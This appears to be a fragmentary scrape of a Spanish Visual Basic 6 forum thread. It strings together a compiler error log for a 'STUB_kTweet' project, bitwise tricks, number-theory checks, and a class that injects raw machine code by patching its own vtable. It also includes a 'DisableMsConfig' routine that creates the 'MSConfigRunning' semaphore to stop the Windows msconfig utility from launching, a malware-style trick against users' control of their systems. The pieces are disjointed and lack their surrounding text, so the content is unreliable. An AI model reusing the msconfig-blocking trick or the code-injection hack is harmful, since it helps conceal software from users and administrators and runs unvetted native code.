C:\WinDDK\7600.16385.1\inc\api\windef.h(167) : error C2143: error de sintaxis : falta ';' delante de '*'
C:\WinDDK\7600.16385.1\inc\api\windef.h(168) : error C2143: error de sintaxis : falta ';' delante de '*'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(94) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(94) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(94) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(94) : error C2448: '_isctype' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(94) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(94) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(95) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(95) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(95) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(95) : error C2448: '_isctype_l' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(95) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(95) : error C2146: error de sintaxis : falta ';' delante del identificador '_locale_t'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(95) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(96) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(96) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(96) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(96) : error C2448: 'isalpha' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(96) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(97) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(97) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(97) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(97) : error C2448: '_isalpha_l' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(97) : error C2146: error de sintaxis : falta ';' delante del identificador '_locale_t'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(97) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(98) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(98) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(98) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(98) : error C2448: 'isupper' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(98) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(99) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(99) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(99) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(99) : error C2448: '_isupper_l' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(99) : error C2146: error de sintaxis : falta ';' delante del identificador '_locale_t'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(99) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(100) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(100) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(100) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(100) : error C2448: 'islower' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(100) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(101) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(101) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(101) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(101) : error C2448: '_islower_l' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(101) : error C2146: error de sintaxis : falta ';' delante del identificador '_locale_t'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(101) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(102) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(102) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(102) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(102) : error C2448: 'isdigit' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(102) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(103) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(103) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(103) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(103) : error C2448: '_isdigit_l' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(103) : error C2146: error de sintaxis : falta ';' delante del identificador '_locale_t'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(103) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(104) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(104) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(104) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(104) : error C2448: 'isxdigit' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(104) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(105) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(105) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(105) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(105) : error C2448: '_isxdigit_l' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(105) : error C2146: error de sintaxis : falta ';' delante del identificador '_locale_t'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(105) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(106) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(106) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(106) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(106) : error C2448: 'isspace' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(106) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(107) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(107) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(107) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(107) : error C2448: '_isspace_l' : el inicializador de estilo de función parece ser una definición de función
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(107) : error C2146: error de sintaxis : falta ';' delante del identificador '_locale_t'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(107) : error C2059: error de sintaxis : ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(108) : error C2144: error de sintaxis : 'int' debe estar precedido de ';'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(108) : error C2065: '_In_' : identificador no declarado
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(108) : error C2144: error de sintaxis : 'int' debe estar precedido de ')'
c:\Archivos de programa\Microsoft Visual Studio 9.0\VC\include\ctype.h(108) : fatal error C1003: el recuento de errores supera 100; se detiene la compilación
El registro de compilación se guardó en el "file://c:\Documents and Settings\Administrador\Escritorio\kTweet\STUB\STUB_kTweet\Release\BuildLog.htm"
STUB_kTweet - 102 errores, 0 advertencias
========== Volver a generar todo: 0 correctos, 1 incorrectos, 0 omitidos ==========
http://karcrack.pastebin.com/ZB6euDbC
1ºMsgBox -> &HFFFFFAC7
2ºMsgBox -> &H1337
http://karcrack.pastebin.com/371zNDm8
MsgBox 125 + –125
n = 2^x ' Potencia de dos
es_mutiple = (i And (n-1) = 0)
CitarEs 1992 multiple de 8?
1992 decimal = 0111 1100 1000 en binario
n = 8 --> n - 1 = 7 --> 7 decimal = 111 en binario
0111 1100 1000
AND 111
______________
0000 0000 0000
CitarEs 12288 multiple de 128?
12288 decimal = 0011 0000 0000 0000 en binario
n = 128 --> n - 1 = 127 --> 127 decimal = 0111 1111 en binario
0011 0000 0000 0000
AND 0111 1111
__________________
0000 0000 0000 0000
'---------------------------------------------------------------------------------------
' Module : cFastSqr
' Author : Karcrack
' Now : 22/08/2010 20:25
' Purpose : Fast alternative for Integer Sqr
' History : 22/08/2010 First cut .........................................................
'---------------------------------------------------------------------------------------
Option Explicit
Private sCode As String
'NTDLL
Private Declare Sub RtlMoveMemory Lib "NTDLL" (Destination As Any, Source As Any, ByVal Length As Long)
Public Function FastSqr(ByVal lValue As Long) As Long
' Filled with ASM later
End Function
Private Sub Class_Initialize()
Dim sCode As String
Dim lPtr As Long
sCode = ChrW$(&H548B) & ChrW$(&HC24) & ChrW$(&H448B) & ChrW$(&H824) & ChrW$(&HFF2) & ChrW$(&HC02A) & ChrW$(&HFF2) & ChrW$(&HC051) & ChrW$(&HFF2) & ChrW$(&HC02D) & ChrW$(&H289) & ChrW$(&HC031) & ChrW$(&HCC2) & ChrW$(&H0)
Call RtlMoveMemory(lPtr, ByVal ObjPtr(Me), 4)
Call RtlMoveMemory(ByVal lPtr + &H1C, StrPtr(sCode), 4)
End Sub
http://karcrack.pastebin.com/CLSZPR5d
Sub Main()
Dim cFS As New cFastSqr
Dim cT As New CTiming
Dim i As Long
Dim x As Long
cT.Reset
For i = 1 To 10000000
x = cFS.FastSqr(i)
Next i
MsgBox cT.sElapsed
cT.Reset
For i = 1 To 10000000
x = CLng(Sqr(i))
Next i
MsgBox cT.sElapsed
End Sub
http://en.wikipedia.org/wiki/Pronic_number
http://oeis.org/classic/A002378
numero_oblongo = n*(n+1)
6 = 2*(2+1)
Private Function IsOblongo(ByVal lNumb As Long, ByRef n As Long) As Boolean
http://mathworld.wolfram.com/OdiousNumber.html
http://oeis.org/classic/A000069
Dim i As Long
For i = 1 To 100000
Call IsItOdious(i)
Next i
'KERNEL32
Private Declare Function CreateSemaphoreW Lib "KERNEL32" (ByVal lpSemaphoreAttributes As Long, ByVal lInitialCount As Long, ByVal lMaximumCount As Long, ByVal lpName As Long) As Long
'---------------------------------------------------------------------------------------
' Procedure : DisableMsConfig
' Author : Karcrack
' Date : 12/08/2010
'---------------------------------------------------------------------------------------
'
Public Function DisableMsConfig() As Boolean
Call CreateSemaphoreW(0, 0, 1, StrPtr("MSConfigRunning"))
DisableMsConfig = (Err.LastDllError = 0)
End Function
http://es.wikipedia.org/wiki/N%C3%BAmero_de_la_suerte
http://www.cobein.com/wp/?p=567